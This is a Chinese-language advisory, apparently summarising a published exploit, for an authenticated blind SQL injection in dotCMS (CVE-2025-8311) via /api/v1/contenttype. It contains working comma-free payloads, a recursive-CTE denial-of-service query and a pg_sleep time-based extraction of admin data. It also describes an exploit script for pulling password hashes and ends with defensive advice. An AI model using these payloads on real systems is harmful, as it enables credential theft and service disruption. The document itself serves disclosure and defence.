dotCMS 25.07.02-1 - 认证盲SQL注入漏洞

漏洞概述

dotCMS 25.07.02-1版本存在认证盲SQL注入漏洞（CVE-2025-8311），影响24.03.22及之后版本。该漏洞允许经过认证的攻击者通过精心构造的SQL查询提取数据库敏感信息。

技术细节

漏洞位置

漏洞存在于内容类型API端点：/api/v1/contenttype

绕过限制

应用程序阻止了逗号字符，因此无法使用传统的DoS载荷。攻击者需要使用无逗号的载荷，例如：

1

') AND 1=(WITH RECURSIVE nums(i) AS (SELECT 1 UNION ALL SELECT i + 1 FROM nums WHERE i < 1000000) SELECT MIN(1) FROM nums AS a CROSS JOIN nums AS b) AND ('A' LIKE 'A

时间盲注技术

利用时间延迟进行数据提取的示例查询：

1

') AND 1=(SELECT CASE WHEN (substring(emailaddress from 1 for 1)='a') THEN (SELECT 1 FROM pg_sleep(10) WHERE firstname='Admin') ELSE 1 END FROM user_ WHERE firstname='Admin') AND ('1' LIKE '1

利用代码分析

核心功能

提供的Python利用脚本实现了以下功能：

1. 漏洞验证：通过时间延迟测试确认SQL注入漏洞存在
2. 字符编码：使用URL编码绕过过滤机制
3. 密码提取：通过逐字符比较提取管理员密码哈希

关键技术点

• 使用pg_sleep()函数实现时间延迟
• 通过substring()函数逐字符提取数据
• 利用chr()函数进行字符比较
• 支持自定义睡眠时间和目标账户

配置参数

1
2
3
4

HOST = "127.0.0.1:8443"
TARGET_ACCOUNT = "admin@dotcms.com"
SLEEP_TIME = 10
TOKEN = "Bearer令牌"

防御建议

• 升级到已修复的安全版本
• 实施严格的输入验证和参数化查询
• 对用户输入进行适当的编码和转义
• 限制数据库用户的权限

影响范围

该漏洞影响dotCMS 24.03.22及之后版本，成功利用可导致敏感信息泄露，包括用户凭证和其他数据库内容。

注：建议使用sqlmap进行漏洞检测时添加--no-cast标志，否则可能无法正常工作。